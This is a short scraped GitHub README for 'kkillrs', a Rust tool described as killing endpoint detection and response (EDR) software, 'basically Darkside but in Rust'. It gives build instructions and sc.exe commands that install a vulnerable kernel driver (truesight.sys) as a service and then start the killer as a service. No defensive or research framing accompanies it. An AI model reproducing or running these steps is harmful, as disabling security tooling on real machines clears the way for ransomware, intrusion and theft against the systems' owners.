SoftPoison / kkillrs

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

kkillrs

WARNING: may cause BSODs. whoops.

It kills EDRs and stuff. Basically Darkside but in Rust, and as a service.

Instructions

cargo build --release
sc.exe create truesight.sys binPath=C:\temp\truesight.sys type=kernel
sc.exe start truesight.sys
sc.exe create kkillrs binPath=C:\temp\kkillrs.exe
sc.exe start kkillrs

About


Languages

Language:Rust 100.0%